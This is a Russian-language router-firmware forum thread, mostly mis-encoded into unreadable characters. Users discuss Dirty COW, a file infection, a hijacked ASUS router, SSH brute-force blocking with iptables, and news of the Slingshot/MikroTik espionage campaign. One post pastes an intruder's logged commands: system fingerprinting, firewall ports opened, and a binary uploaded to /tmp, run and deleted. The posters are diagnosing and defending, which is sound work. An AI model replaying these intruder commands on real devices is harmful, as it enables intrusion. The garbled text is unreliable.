¬ €дре Linux обнаружена опасна€ 0-day у€звимость Dirty COW (https://habrastorage.org/files/f8c/c93/326/f8cc9332601b48ff9786f3836009b067.png) :confused:

https://habrahabr.ru/company/defconru/blog/313276/

«.џ. https://sourceforge.net/p/wive-ng/wive-ng-mt/ci/bdf12bc55d84a5113e160cae4c0ee0121c55d782/ ;)

lly
24-10-2016, 10:16
CVE-2016-5195

“ак как это исключительно local privilege escalation и публичных эксплойтов под старые €дра пока никто не выложил, панику разводить не надо :p

Ќо бэкпорт патча сделаю, как будет врем€.

Service2
23-02-2017, 16:11
ѕрошивка древн€€
Linux version 2.6.22.19 (root@localhost) (gcc version 4.6.3 (GCC) ) #2 Mon Oct 8 18:11:53 YEKT 2012
1.9.2.7-rtn-r4667

ƒело в том что эта зараза (в атачче выделены 3 файла, которые во многих папках по€вились), как-то залезла в файловую систему и там размножилась, а € думал что под линукс вирусов нет 😉
ƒумал, рекурсивно удалить в BusyBox файл, например Ђphoto.scrї.
locate file Ц найти все файлы с именем file Ч не находит locate. ѕодскажите как рекурсивно удалить файлы? Ќа роутете много чего наставлено, и переустанавливать и настраивать не хотелось бы, поэтому хотел бы тупо удалить подозрительные файлы, но руками ходить лень. ћогу приложить вывод команды какой нужно.
10305

don-pedro
27-02-2017, 09:37
ƒело в том что эта зараза (в атачче выделены 3 файла, которые во многих папках по€вились), как-то залезла в файловую систему и там размножилась, а € думал что под линукс вирусов нет ��
ќказываетс€, есть.


ƒумал, рекурсивно удалить в BusyBox файл, например Ђphoto.scrї.
locate file Ц найти все файлы с именем file Ч не находит locate. ѕодскажите как рекурсивно удалить файлы?
find
¬ инете полно примеров.


Ќа роутете много чего наставлено, и переустанавливать и настраивать не хотелось бы, поэтому хотел бы тупо удалить подозрительные файлы, но руками ходить лень. ћогу приложить вывод команды какой нужно.
ѕрежде чем удал€ть, следует разобратьс€, откуда эти файлы вз€лись.

Service2
01-03-2017, 17:02
find
-sh: find: not found

 ак и ожидалось, удаление руками на долго не помогло. ‘айлы с таким же именем оп€ть по€вл€ютс€. ѕомогите разобратьс€ и найти источник заразы?

don-pedro
02-03-2017, 08:32
find
-sh: find: not found

findutils надо поставить.


 ак и ожидалось, удаление руками на долго не помогло. ‘айлы с таким же именем оп€ть по€вл€ютс€. ѕомогите разобратьс€ и найти источник заразы?
≈сли диск самбой расшарен, то источник заразы - домашние компы.

Omega
06-03-2017, 20:43
ѕомогите определить что происходит на прошивке RT-AC68U от Hugo - атакуют боты !
Ћогин не стандартный, пароль сложный 13 букв чисел с заглавными. ”же мен€л 3 раза пароли и логин.
SSH только по ключу. Ћогин и пароль отключены дл€ SSH. порт произвольный.
Entware-ng не установлен, единственное что использую это StealthMode Sunset (Merlin) (http://monter.techlog.pl/files/download/_Projects/ASUSWRT/stealth_mode/sunset/)

ѕотом выполн€етс€ вход и SSH включают дл€ wan и включают использование паролей в SSH и мен€ют порт на 2222

Mar 6 06:59:04 dropbear[29479]: Child connection from 190.137.111.208:48605
Mar 6 06:59:14 dropbear[29479]: Password auth succeeded for 'Born' from 190.137.111.208:48605
Mar 6 07:00:30 dropbear[29563]: Running in background
Mar 6 07:01:21 dropbear[29651]: Child connection from 190.137.111.208:36802
Mar 6 07:01:31 dropbear[29651]: Password auth succeeded for 'Born' from 190.137.111.208:36802
Mar 6 07:01:37 dropbear[29651]: User Born executing '/sbin/ifconfig'
Mar 6 07:01:41 dropbear[29651]: User Born executing 'cat /proc/meminfo'
Mar 6 07:01:45 dropbear[29651]: User Born executing '2>/dev/null sh -c 'cat /lib/libdl.so* || cat /lib/librt.so* || cat /bin/cat || cat /sbin/ifconfig''
Mar 6 07:01:51 dropbear[29651]: User Born executing 'cat /proc/version'
Mar 6 07:01:55 dropbear[29651]: User Born executing 'uptime'
Mar 6 07:01:59 dropbear[29651]: User Born executing '1>/dev/null 2>/dev/null /sbin/iptables -L -n && echo 1 || echo 0'
Mar 6 07:02:03 dropbear[29651]: User Born executing '(python -V 2>/dev/null && echo python && python -V) || (/usr/local/bin/python -V 2>/dev/null && echo /usr/local/bin/python && /usr/local/bin/python -V)'
Mar 6 07:02:06 dropbear[29651]: Exit (Born): Exited normally
Mar 6 07:04:34 dropbear[29940]: Child connection from 109.237.123.45:55826
Mar 6 07:04:42 dropbear[29940]: Password auth succeeded for 'Born' from 109.237.123.45:55826
Mar 6 07:05:14 dropbear[29940]: User Born executing 'cat /proc/version'
Mar 6 07:05:17 dropbear[29940]: User Born executing 'PATH=$PATH:/usr/sbin iptables -L -n'
Mar 6 07:05:22 dropbear[29940]: User Born executing 'ps'
Mar 6 07:05:26 dropbear[29940]: User Born executing 'cat /bin/cat 2>/dev/null'
Mar 6 07:07:19 dropbear[29940]: User Born executing 'cat > /tmp/bungee'
Mar 6 07:07:52 dropbear[29940]: User Born executing 'PATH=$PATH:/usr/sbin iptables -D INPUT -p tcp --dport 16872 -j ACCEPT; PATH=$PATH:/usr/sbin iptables -I INPUT -p tcp --dport 16872 -j ACCEPT'
Mar 6 07:08:02 dropbear[29940]: User Born executing 'PATH=$PATH:/usr/sbin iptables -t nat -D PREROUTING -p tcp --dport 16872 -j ACCEPT; PATH=$PATH:/usr/sbin iptables -t nat -I PREROUTING -p tcp --dport 16872 -j ACCEPT'
Mar 6 07:08:11 dropbear[29940]: User Born executing 'PATH=$PATH:/usr/sbin iptables -D DMZ -t nat -p tcp --dport 16872 -j RETURN; PATH=$PATH:/usr/sbin iptables -I DMZ -t nat -p tcp --dport 16872 -j RETURN'
Mar 6 07:08:24 dropbear[29940]: User Born executing 'chmod +x /tmp/bungee'
Mar 6 07:08:38 dropbear[29940]: User Born executing '( /tmp/bungee 16872 30 360 14400 0 10000 > /dev/null 2>&1 )&'
Mar 6 07:08:49 dropbear[29940]: User Born executing 'rm -f /tmp/bungee'
Mar 6 07:09:09 dropbear[29940]: Exit (Born): Exited normally
Mar 6 07:16:14 dropbear[30616]: Child connection from 149.255.202.108:51786
Mar 6 07:16:14 dropbear[30616]: Password auth succeeded for 'Born' from 149.255.202.108:51786
Mar 6 07:16:41 dropbear[30616]: Exit (Born): Exited normally

<< в логе авторизаци€ не по ключу, а по паролю. ћожет, dropbear какой-древний?

ѕроблема в том что он логинитс€ к веб-морде с вне (WAN) и мен€ет настройки SSH на свой порт 2222 и вход по паролю.
ƒоступ с WAN мне очень нужен так как, этот роутер стоит в маленьком офисе.

¬ логах нет попыток подбора парол€. Ћогинитс€ он с первого раза. «на€ Ћогин и ѕароль.
ѕолучаетс€ утечка логина и парол€ только с внутри роутера.
Ћогин и пароль не сохранен в браузере, вход на него только с проверенного одного ноута.
ћожно как то ограничить вход в ¬еб-морду через один ћј ?

<< ј tcpdump-ом (или другим анализатором) не проще трафик проанализировать, что бы просто узнать, как они к ¬ам попадают?

ѕопадает он на веб-морду роутера по логину и паролю, потом включает SSH, и коннектитс€ по SSH. ¬от старый лог с феврал€:


Feb 20 00:09:14 HTTP(S) login: Login successful from 189.25.95.249
Feb 20 00:09:33 rc_service: httpd 1258:notify_rc restart_time;restart_httpd;restart_upnp
Feb 20 00:09:33 dropbear[1235]: Early exit: Terminated by signal
Feb 20 00:09:33 kernel: klogd: exiting
Feb 20 00:09:33 syslogd exiting
Feb 20 00:09:33 syslogd started: BusyBox v1.25.1
Feb 20 00:09:33 kernel: klogd started: BusyBox v1.25.1 (2017-01-25 00:07:39 WET)
Feb 20 00:09:33 dropbear[1903]: Running in background
Feb 20 00:09:34 start_nat_rules: apply the nat_rules(/tmp/nat_rules_vlan2_vlan2)!
Feb 20 00:09:34 RT-AC68U: start httpd
Feb 20 00:09:36 miniupnpd[1929]: HTTP listening on port 55981
Feb 20 00:09:36 miniupnpd[1929]: Listening for NAT-PMP/PCP traffic on port 5351
Feb 20 00:09:36 hour monitor: daemon is starting
Feb 20 00:09:36 hour monitor: daemon terminates
Feb 20 00:09:41 dropbear[1930]: Child connection from 189.25.95.249:45127


Hint! :D http://forum.ixbt.com/topic.cgi?id=14:62613:2149#2149

egorart
20-05-2017, 10:31
что-то € туплю
поставил защиту от брута (в веб-морде) 1200 секунд это получаетс€ 20 минут
вижу это в iptables-save

...
-A INPUT -p tcp -m tcp --dport 22022 --tcp-flags FIN,SYN,RST,ACK SYN -j BRUTE
...
-A BRUTE -m recent --update --seconds 1200 --hitcount 3 --name BRUTE --rsource -j DROP
-A BRUTE -m recent --set --name BRUTE --rsource -j ACCEPT
...

однако, суд€ по логам 10 мин.

20-05-2017 11:19:52 (warning|authpriv|dropbear) Login attempt for nonexistent user from 220.225.230.7:53053
20-05-2017 11:19:52 (warning|authpriv|dropbear) Login attempt for nonexistent user from 220.225.230.7:53053
20-05-2017 11:19:53 (warning|authpriv|dropbear) Login attempt for nonexistent user from 220.225.230.7:53053
20-05-2017 11:19:54 (info|authpriv|dropbear) Exit before auth: Exited normally
20-05-2017 11:27:23 (warning|authpriv|dropbear) Login attempt for nonexistent user from 46.128.44.23:47069
20-05-2017 11:27:23 (warning|authpriv|dropbear) Login attempt for nonexistent user from 46.128.44.23:47069
20-05-2017 11:27:24 (warning|authpriv|dropbear) Login attempt for nonexistent user from 46.128.44.23:47069
20-05-2017 11:27:24 (info|authpriv|dropbear) Exit before auth: Exited normally
20-05-2017 11:27:58 (warning|authpriv|dropbear) Login attempt for nonexistent user from 220.225.230.7:42213
20-05-2017 11:27:59 (warning|authpriv|dropbear) Login attempt for nonexistent user from 220.225.230.7:42213
20-05-2017 11:27:59 (warning|authpriv|dropbear) Login attempt for nonexistent user from 220.225.230.7:42213
20-05-2017 11:28:00 (info|authpriv|dropbear) Exit before auth: Exited normally
20-05-2017 11:35:51 (warning|authpriv|dropbear) Login attempt for nonexistent user from 46.128.44.23:40636
20-05-2017 11:35:51 (warning|authpriv|dropbear) Login attempt for nonexistent user from 46.128.44.23:40636
20-05-2017 11:35:51 (warning|authpriv|dropbear) Login attempt for nonexistent user from 46.128.44.23:40636
20-05-2017 11:35:52 (info|authpriv|dropbear) Exit before auth: Exited normally
20-05-2017 11:36:23 (warning|authpriv|dropbear) Login attempt for nonexistent user from 220.225.230.7:49339
20-05-2017 11:36:23 (warning|authpriv|dropbear) Login attempt for nonexistent user from 220.225.230.7:49339
20-05-2017 11:36:24 (warning|authpriv|dropbear) Login attempt for nonexistent user from 220.225.230.7:49339

в чем кос€к?
прошивка последн€€ с asus.vectormm.net/rtn/
роутер asus rt-n16

и вот что-то туплю с блокировкой (
если € правильно пон€л, то надо так:

iptables -A INPUT -p tcp -s 220.225.230.7 --dport 22022 -j DROP
iptables -A INPUT -p tcp -s 46.128.44.23 --dport 22022 -j DROP
однако, в лока всЄ равно есть информаци€ о попытках подключени€

egorart
22-05-2017, 11:52
 ажетс€ разобралс€.
≈сли происходит просто долбежка с несуществующим именим (nonexistent), то ни чего не блокируетс€.
ј если им€ известно, то блокировка происходит.

22-05-2017 11:28:57 (warning|authpriv|dropbear) Bad password attempt for 'root' from 188.xxx.xx.10:14384
22-05-2017 11:29:02 (warning|authpriv|dropbear) Bad password attempt for 'root' from 188.xxx.xx.10:14384
22-05-2017 11:29:02 (info|authpriv|dropbear) Exit before auth (user 'root', 10 fails): Max auth tries reached - user 'root' from 188.xxx.xx.10:14384
≈сли добавл€ть правила, как € пон€л, в конец (iptables -A INPUT -p tcp -s 220.225.230.7 --dport 22022 -j DROP), то не блокируетс€.
ј если в начало (iptables -I INPUT -s 220.225.230.7 -j DROP), то вроде как блокирует.
¬ логах теперь этих ip нет.

п.с. надеюсь такой вариант блокировки правильный
п.п.с. да, про fail2ban знаю. охото было так разобратьс€.

egorart
16-10-2017, 18:09
”€звимости в Dnsmasq, позвол€ющие удалЄнно выполнить код атакующего (https://www.opennet.ru/opennews/art.shtml?num=47311)
јтака против WPA2, позвол€юща€ перехватить трафик в WiFi-сети (https://www.opennet.ru/opennews/art.shtml?num=47392)
:(

Omega
12-03-2018, 16:50
–Р–љ—В–Є–≤–Є—А—Г—Б–љ–∞—П –Ї–Њ–Љ–њ–∞–љ–Є—П ¬Ђ–Ы–∞–±–Њ—А–∞—В–Њ—А–Є—П –Ъ–∞—Б–њ–µ—А—Б–Ї–Њ–≥–Њ¬ї –Њ–±–љ–∞—А—Г–ґ–Є–ї–∞ —И–њ–Є–Њ–љ—Б–Ї—Г—О –∞—В–∞–Ї—Г —З–µ—А–µ–Ј –≤–Ј–ї–Њ–Љ–∞–љ–љ—Л–µ –Љ–∞—А—И—А—Г—В–Є–Ј–∞—В–Њ—А—Л MikroTik, –Ї–Њ—В–Њ—А—Л–µ —Б—В–∞–ї–Є –ґ–µ—А—В–≤–∞–Љ–Є –≥–ї–∞–≤–љ—Л–Љ –Њ–±—А–∞–Ј–Њ–Љ –≤ –Р—Д—А–Є–Ї–µ –Є –љ–∞ –С–ї–Є–ґ–љ–µ–Љ –Т–Њ—Б—В–Њ–Ї–µ. –Я–Њ —Б–ї–Њ–≤–∞–Љ –≤–Є—А—Г—Б–∞-–Є—Б—В—А–µ–±–Є—В–µ–ї—П, —Н—В–Њ –∞—В–∞–Ї–∞, —Б–Њ–њ–Њ—Б—В–∞–≤–Є–Љ–∞—П –њ–Њ —Б–ї–Њ–ґ–љ–Њ—Б—В–Є —Б –і–≤—Г–Љ—П —А–∞–љ–µ–µ –Њ–±–љ–∞—А—Г–ґ–µ–љ–љ—Л–Љ–Є —И–њ–Є–Њ–љ—Б–Ї–Є–Љ–Є –∞—В–∞–Ї–∞–Љ–Є, –Є–Ј–≤–µ—Б—В–љ—Л–Љ–Є –Ї–∞–Ї Regin –Є Sauron.

Slingshot, –Ї–∞–Ї –љ–∞–Ј—Л–≤–∞–µ—В—Б—П –≥—А—Г–њ–њ–∞, —Б—В–Њ—П—Й–∞—П –Ј–∞ –∞—В–∞–Ї–Њ–є, –Є—Б–њ–Њ–ї—М–Ј—Г–µ—В —Б–Ї–Њ–Љ–њ—А–Њ–Љ–µ—В–Є—А–Њ–≤–∞–љ–љ—Л–µ –Љ–∞—А—И—А—Г—В–Є–Ј–∞—В–Њ—А—Л MikroTik –і–ї—П –Ј–∞—А–∞–ґ–µ–љ–Є—П –ґ–µ—А—В–≤. MikroTik –њ—А–µ–і–ї–∞–≥–∞–µ—В –Ї–ї–Є–µ–љ—В–∞–Љ –њ—А–Њ–≥—А–∞–Љ–Љ—Г –њ–Њ–і –љ–∞–Ј–≤–∞–љ–Є–µ–Љ WinBox –і–ї—П —Г–њ—А–∞–≤–ї–µ–љ–Є—П –Љ–∞—А—И—А—Г—В–Є–Ј–∞—В–Њ—А–∞–Љ–Є. –Я—А–Њ–≥—А–∞–Љ–Љ–∞, –Ї–Њ—В–Њ—А–∞—П –љ–∞—Е–Њ–і–Є—В—Б—П –љ–∞ –Љ–∞—А—И—А—Г—В–Є–Ј–∞—В–Њ—А–µ, –Ј–∞–≥—А—Г–ґ–∞–µ—В –љ–µ—Б–Ї–Њ–ї—М–Ї–Њ —Д–∞–є–ї–Њ–≤ DLL –Є–Ј —Д–∞–є–ї–Њ–≤–Њ–є —Б–Є—Б—В–µ–Љ—Л –Љ–∞—А—И—А—Г—В–Є–Ј–∞—В–Њ—А–∞ –Є –Ј–∞–≥—А—Г–ґ–∞–µ—В –Є—Е –љ–µ–њ–Њ—Б—А–µ–і—Б—В–≤–µ–љ–љ–Њ –≤ –њ–∞–Љ—П—В—М –Ї–Њ–Љ–њ—М—О—В–µ—А–∞.

–І—В–Њ–±—Л –Ј–∞—А–∞–Ј–Є—В—М –∞–і–Љ–Є–љ–Є—Б—В—А–∞—В–Њ—А–Њ–≤ –Љ–∞—А—И—А—Г—В–Є–Ј–∞—В–Њ—А–Њ–≤ MikroTik, –Ј–ї–Њ—Г–Љ—Л—И–ї–µ–љ–љ–Є–Ї–Є —А–∞–Ј–Љ–µ—Б—В–Є–ї–Є –≤—А–µ–і–Њ–љ–Њ—Б–љ—Г—О –≤–µ—А—Б–Є—О —Д–∞–є–ї–∞ dll —Б –Є–Љ–µ–љ–µ–Љ ipv4.dll –љ–∞ —Г—П–Ј–≤–Є–Љ—Л—Е –Љ–∞—А—И—А—Г—В–Є–Ј–∞—В–Њ—А–∞—Е. –Я–Њ—Б–ї–µ –і–Њ–±–∞–≤–ї–µ–љ–Є—П —Н—В–Њ—В DLL-—Д–∞–є–ї –Ј–∞–≥—А—Г–ґ–∞–µ—В—Б—П –Є –≤—Л–њ–Њ–ї–љ—П–µ—В—Б—П WinBox. –Я–Њ –Љ–љ–µ–љ–Є—О –Є—Б—Б–ї–µ–і–Њ–≤–∞—В–µ–ї–µ–є, —Н—В–∞ DLL - —Н—В–Њ —В—А–Њ—П–љ—Б–Ї–Є–є –Ј–∞–≥—А—Г–Ј—З–Є–Ї, –Ї–Њ—В–Њ—А—Л–є —Г—Б—В–∞–љ–∞–≤–ї–Є–≤–∞–µ—В –і–Њ–њ–Њ–ї–љ–Є—В–µ–ї—М–љ—Л–µ –≤—А–µ–і–Њ–љ–Њ—Б–љ—Л–µ –њ—А–Њ–≥—А–∞–Љ–Љ—Л –≤ —Б–Є—Б—В–µ–Љ–µ. –Ъ–∞–Ї –Ј–ї–Њ—Г–Љ—Л—И–ї–µ–љ–љ–Є–Ї–∞–Љ —Г–і–∞–ї–Њ—Б—М –≤–Ј–ї–Њ–Љ–∞—В—М –Љ–∞—А—И—А—Г—В–Є–Ј–∞—В–Њ—А—Л MikroTik –Є –њ—А–µ–і–Њ—Б—В–∞–≤–Є—В—М –≤—А–µ–і–Њ–љ–Њ—Б–љ—Л–є —Д–∞–є–ї dll, –љ–µ–Є–Ј–≤–µ—Б—В–љ–Њ.

–І—В–Њ –Ј–љ–∞—О—В –Є—Б—Б–ї–µ–і–Њ–≤–∞—В–µ–ї–Є, —В–∞–Ї —Н—В–Њ —В–Њ, —З—В–Њ —Д–∞–є–ї dll –Ј–∞–≥—А—Г–ґ–∞–µ—В —А–∞–Ј–ї–Є—З–љ—Л–µ –Љ–Њ–і—Г–ї–Є, –≤–Ї–ї—О—З–∞—П –Љ–Њ–і—Г–ї—М —П–і—А–∞ –Є –Љ–Њ–і—Г–ї—М –њ–Њ–ї—М–Ј–Њ–≤–∞—В–µ–ї—М—Б–Ї–Њ–≥–Њ —А–µ–ґ–Є–Љ–∞. –Ь–Њ–і—Г–ї–Є –њ—А–µ–і–љ–∞–Ј–љ–∞—З–µ–љ—Л –і–ї—П —Б–±–Њ—А–∞ –Є –Ї—А–∞–ґ–Є –і–∞–љ–љ—Л—Е –Є –Њ–±–µ—Б–њ–µ—З–µ–љ–Є—П –±–µ–Ј–Њ–њ–∞—Б–љ–Њ—Б—В–Є —Б–Є—Б—В–µ–Љ—Л. –І—В–Њ–±—Л –Ј–∞–њ—Г—Б—В–Є—В—М –Ї–Њ–і –≤ —А–µ–ґ–Є–Љ–µ —П–і—А–∞, Slingshot –Ј–∞–≥—А—Г–ґ–∞–µ—В –њ–Њ–і–њ–Є—Б–∞–љ–љ—Л–µ —Г—П–Ј–≤–Є–Љ—Л–µ –і—А–∞–є–≤–µ—А—Л. –С–ї–∞–≥–Њ–і–∞—А—П —Г—П–Ј–≤–Є–Љ–Њ—Б—В–Є –≤ —Н—В–Є—Е –і—А–∞–є–≤–µ—А–∞—Е –≤—А–µ–і–Њ–љ–Њ—Б–љ–Њ–µ –Я–Ю –≤—Л–њ–Њ–ї–љ—П–µ—В —Б–Њ–±—Б—В–≤–µ–љ–љ—Л–є –Ї–Њ–і. –Я–Њ—Б–Ї–Њ–ї—М–Ї—Г –≤—Л–њ–Њ–ї–љ—П–µ—В—Б—П –Ї–Њ–і —Б –њ—А–∞–≤–∞–Љ–Є —П–і—А–∞, –Њ–љ –Є–Љ–µ–µ—В –њ–Њ–ї–љ—Л–є –Ї–Њ–љ—В—А–Њ–ї—М –љ–∞–і —Б–Є—Б—В–µ–Љ–Њ–є –Є –Љ–Њ–ґ–µ—В —Б–Ї—А—Л–≤–∞—В—М—Б—П –і–ї—П –∞–љ—В–Є–≤–Є—А—Г—Б–љ–Њ–≥–Њ –њ—А–Њ–≥—А–∞–Љ–Љ–љ–Њ–≥–Њ –Њ–±–µ—Б–њ–µ—З–µ–љ–Є—П.

–Ъ–Є–±–µ—А-—И–њ–Є–Њ–љ–∞–ґ
–¶–µ–ї—М—О Slingshot —П–≤–ї—П–µ—В—Б—П –Ї–Є–±–µ—А-—И–њ–Є–Њ–љ–∞–ґ. –Ш—Б—Б–ї–µ–і–Њ–≤–∞–љ–Є–µ –њ–Њ–Ї–∞–Ј—Л–≤–∞–µ—В, —З—В–Њ –≤—А–µ–і–Њ–љ–Њ—Б–љ–∞—П –њ—А–Њ–≥—А–∞–Љ–Љ–∞ —Б–Њ–±–Є—А–∞–µ—В —Б–Ї—А–Є–љ—И–Њ—В—Л, –і–∞–љ–љ—Л–µ –љ–∞ –Ї–ї–∞–≤–Є–∞—В—Г—А–µ, —Б–µ—В–µ–≤—Л–µ –і–∞–љ–љ—Л–µ, –њ–∞—А–Њ–ї–Є, —Б–Њ–µ–і–Є–љ–µ–љ–Є—П USB, –∞–Ї—В–Є–≤–љ–Њ—Б—В—М –љ–∞ —А–∞–±–Њ—З–µ–Љ —Б—В–Њ–ї–µ, —Б–Њ–і–µ—А–ґ–Є–Љ–Њ–µ –±—Г—Д–µ—А–∞ –Њ–±–Љ–µ–љ–∞ –Є –і—А—Г–≥–Є–µ –і–∞–љ–љ—Л–µ –Є –Њ—В–њ—А–∞–≤–ї—П–µ—В –Є—Е –Ј–ї–Њ—Г–Љ—Л—И–ї–µ–љ–љ–Є–Ї–∞–Љ. –І—В–Њ –њ—А–Є–Љ–µ—З–∞—В–µ–ї—М–љ–Њ –≤ –Њ—В–љ–Њ—И–µ–љ–Є–Є –≤—А–µ–і–Њ–љ–Њ—Б–љ–Њ–≥–Њ –Я–Ю, —В–∞–Ї —Н—В–Њ —В–Њ, —З—В–Њ –Њ–љ –Њ—В–Ї–ї—О—З–∞–µ—В –њ—А–Њ–≥—А–∞–Љ–Љ–љ–Њ–µ –Њ–±–µ—Б–њ–µ—З–µ–љ–Є–µ –і–ї—П –і–µ—Д—А–∞–≥–Љ–µ–љ—В–∞—Ж–Є–Є –ґ–µ—Б—В–Ї–Њ–≥–Њ –і–Є—Б–Ї–∞. Slingshot –Є—Б–њ–Њ–ї—М–Ј—Г–µ—В —Б–Њ–±—Б—В–≤–µ–љ–љ—Г—О –Ј–∞—И–Є—Д—А–Њ–≤–∞–љ–љ—Г—О —Д–∞–є–ї–Њ–≤—Г—О —Б–Є—Б—В–µ–Љ—Г, –Ї–Њ—В–Њ—А–∞—П –Љ–Њ–ґ–µ—В –љ–∞—Е–Њ–і–Є—В—М—Б—П –≤ –љ–µ–Є—Б–њ–Њ–ї—М–Ј—Г–µ–Љ–Њ–є —З–∞—Б—В–Є –ґ–µ—Б—В–Ї–Њ–≥–Њ –і–Є—Б–Ї–∞. –Я—А–Є –і–µ—Д—А–∞–≥–Љ–µ–љ—В–∞—Ж–Є–Є –ґ–µ—Б—В–Ї–Њ–≥–Њ –і–Є—Б–Ї–∞ –і–∞–љ–љ—Л–µ –Љ–Њ–≥—Г—В –±—Л—В—М –Ј–∞–њ–Є—Б–∞–љ—Л –≤ —Н—В—Г —З–∞—Б—В—М, —З—В–Њ –Љ–Њ–ґ–µ—В –њ–Њ–≤—А–µ–і–Є—В—М –≤–Є—А—В—Г–∞–ї—М–љ—Г—О —Д–∞–є–ї–Њ–≤—Г—О —Б–Є—Б—В–µ–Љ—Г.

–Я–Њ –і–∞–љ–љ—Л–Љ ¬Ђ–Ы–∞–±–Њ—А–∞—В–Њ—А–Є–Є –Ъ–∞—Б–њ–µ—А—Б–Ї–Њ–≥–Њ¬ї, Slingshot —А–∞–±–Њ—В–∞–µ—В —Б 2012 –≥–Њ–і–∞ –Є –њ–Њ-–њ—А–µ–ґ–љ–µ–Љ—Г —А–∞–±–Њ—В–∞–µ—В. –Р–љ—В–Є–≤–Є—А—Г—Б–љ–∞—П –Ї–Њ–Љ–њ–∞–љ–Є—П —Г–≤–Є–і–µ–ї–∞ –Њ–Ї–Њ–ї–Њ 100 –ґ–µ—А—В–≤ –≤ –Ъ–µ–љ–Є–Є, –Щ–µ–Љ–µ–љ–µ, –Р—Д–≥–∞–љ–Є—Б—В–∞–љ–µ, –Ы–Є–≤–Є–Є, –Ъ–Њ–љ–≥–Њ, –Ш–Њ—А–і–∞–љ–Є–Є, –Ґ—Г—А—Ж–Є–Є, –Ш—А–∞–Ї–µ, –°—Г–і–∞–љ–µ, –°–Њ–Љ–∞–ї–Є –Є –Ґ–∞–љ–Ј–∞–љ–Є–Є. –С–Њ–ї—М—И–Є–љ—Б—В–≤–Њ –ґ–µ—А—В–≤ - —Н—В–Њ –ї—О–і–Є, –∞ –љ–µ –Њ—А–≥–∞–љ–Є–Ј–∞—Ж–Є–Є, –љ–Њ —А–∞–Ј–ї–Є—З–љ—Л–µ –њ—А–∞–≤–Є—В–µ–ї—М—Б—В–≤–µ–љ–љ—Л–µ –Њ—А–≥–∞–љ–Є–Ј–∞—Ж–Є–Є –Є —Г—З—А–µ–ґ–і–µ–љ–Є—П —В–∞–Ї–ґ–µ —Б—В—А–∞–і–∞—О—В –Њ—В –≤—А–µ–і–Њ–љ–Њ—Б–љ–Њ–≥–Њ –Я–Ю. –С–Њ–ї—М—И–Є–љ—Б—В–≤–Њ –ґ–µ—А—В–≤ –љ–∞–±–ї—О–і–∞–ї–Є—Б—М –≤ –Ъ–µ–љ–Є–Є –Є –Щ–µ–Љ–µ–љ–µ. MikroTik —Б–Ї–∞–Ј–∞–ї ¬Ђ–Ы–∞–±–Њ—А–∞—В–Њ—А–Є–Є –Ъ–∞—Б–њ–µ—А—Б–Ї–Њ–≥–Њ¬ї –≤ –Ї–Њ–Љ–Љ–µ–љ—В–∞—А–Є–Є, —З—В–Њ –њ–Њ—Б–ї–µ–і–љ—П—П –≤–µ—А—Б–Є—П WinBox –±–Њ–ї—М—И–µ –љ–µ –Ј–∞–≥—А—Г–ґ–∞–µ—В —Д–∞–є–ї ipv4.dll –љ–∞ –Ї–Њ–Љ–њ—М—О—В–µ—А, —Б –Ї–Њ—В–Њ—А—Л–Љ —Н—В–Њ—В –≤–µ–Ї—В–Њ—А –∞—В–∞–Ї–Є –Ј–∞–Ї—А—Л—В. –Т —Н—В–Њ–Љ –Њ—В—З–µ—В–µ (pdf) ¬Ђ–Ы–∞–±–Њ—А–∞—В–Њ—А–Є—П –Ъ–∞—Б–њ–µ—А—Б–Ї–Њ–≥–Њ¬ї –њ—А–µ–і–Њ—Б—В–∞–≤–ї—П–µ—В –Є–љ—Д–Њ—А–Љ–∞—Ж–Є—О –Є —Е–µ—И–Є —Д–∞–є–ї–Њ–≤ –Є –і–Њ–Љ–µ–љ–Њ–≤, –Ї–Њ—В–Њ—А—Л–µ –Є—Б–њ–Њ–ї—М–Ј—Г–µ—В –≤—А–µ–і–Њ–љ–Њ—Б–љ–Њ–µ –Я–Ю.

https://forum.mikrotik.com/viewtopic.php?t=131748 :D

ff0255
06-08-2019, 23:48
Ќаши девайсы на прошивке энтузиастов вроде не попадают? (написано "Linux kernel version 2.6.29 or higher", а у нас 2.6.22)
https://www.theregister.co.uk/2019/06/17/linux_tcp_sack_kernel_crash/
https://access.redhat.com/security/vulnerabilities/tcpsack

Ќа вс€кий случай добавил в post-firewall:

iptables -I SECURITY -p tcp --tcp-flags SYN SYN -m tcpmss --mss 1:500 -j logdrop
ip6tables -I SECURITY -p tcp --tcp-flags SYN SYN -m tcpmss --mss 1:500 -j logdrop